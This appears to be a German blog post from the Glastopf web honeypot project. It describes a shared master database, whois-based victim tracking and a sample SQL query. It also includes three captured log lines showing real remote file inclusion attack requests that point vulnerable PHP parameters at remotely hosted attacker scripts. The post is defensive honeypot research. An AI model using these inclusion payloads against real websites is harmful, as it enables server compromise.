Im
Glastopf wurde nun das Nutzen einer Datenbank,
in die verschiedene Glastöpfe ihre Daten ablegen können, implementiert.
Dem Nutzer steht es nun offen, nur in seine eigene Datenbank, nur in die Masterdb,
oder in beide zu schreiben.
Die Tabellenstruktur in der masterdb wurde soweit ausgedünnt,
dass nur noch für derer Zweck relevante Daten übertragen werden.
Projektmitglied Mike hat eine solche Datenbank aufgesetzt und
aktuell schreiben vier unabhängige Glastopf-Webhoneypots dort hinein.
Von den Daten der einzelnen
Glastöpfe können nun alle,
die bei der Entwicklung helfen, profitieren.
Insbesondere macht das Sinn, wenn man die Module etwas bearbeitet hat,
und noch nicht sicher ist, ob die Änderung erfolgreich war.
Die Erfassung der mnt-by Einträge von den whois-Servern wurde auf das "Opfer" ausgedehnt.
Nun lassen sich durch einen einfachen mysql query alle IPs/domains aufspüren,
die für einen ISP und seine abuse/security Abteilung relevant sein könnten.
Also sowohl diese IPs, die als Angreifer fungieren, also wo der scanner oder Wurm läuft,
als auch die, die entsprechende bots/Skripte/shells auf dem System liegen haben,
höchstwahrscheinlich ohne etwas davon zu wissen.
Denn in den meisten Fällen sind das entweder Freehoster oder Opfer,
bei denen die
bösartigen Skripte abgelegt werden.
Ein solcher query könnte z.B. für das
INTERGENIA-Netz so aussehen:
CODE:
select * from log where mnt LIKE '%INTERGENIA%' OR vicmnt LIKE '%INTERGENIA%' order by id DESC;
Das Ergebnis ist:
332 Einträge in der Masterdb zwischen dem 22.4.2009, 7:28 und dem 24.4.2009, 0:40.
Das ist eine ganze Menge !
oO
Hier mal ein schnipp-schnapp:
CODE:
12271 steelworker_glastopf_2 b2bserver.de 85.25.226.30 23.04.2009 05:32:04 -0100 //index.php?content=http://www.cap.org.hk/phpATM/cfg/id.txt???? libwww-perl/5.805 ['INTERGENIA-MNT'] ['RIPE-NCC-MNT', 'RIPE-NCC-HM-MNT'] 3 1 e7cb2fdaa9c7bfcf1e2f5d6056cbf0d4 cap.org.hk
11596 steelworker_glastopf_2 austria250.server4you.de 217.172.186.250 23.04.2009 04:32:57 -0100 /order/login.php?svr_rootscript=http://zonadeclientes.com/id1.txt?? Mozilla/5.0 ['INTERGENIA-MNT'] ['RIPE-NCC-MNT', 'RIPE-NCC-HM-MNT'] 3 1 a05dfd7cca7771a7565a154d65f05ea2 zonadeclientes.com
10913 steelworker_glastopf_2 bravo725.server4you.de 85.25.132.91 23.04.2009 03:27:42 -0100 //includes/db_connect.php?baseDir=http://www.ambient-arts.co.uk/lock.txt??? Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) ['INTERGENIA-MNT'] ['RIPE-NCC-MNT', 'RIPE-NCC-HM-MNT'] 2 1 fad15cb7bde1192d8cbd86bbbf5c56bb ambient-arts.co.uk
Alle Neuerungen findet ihr im
Glastopf Trac.
Schaut mal rein, es lohnt sich!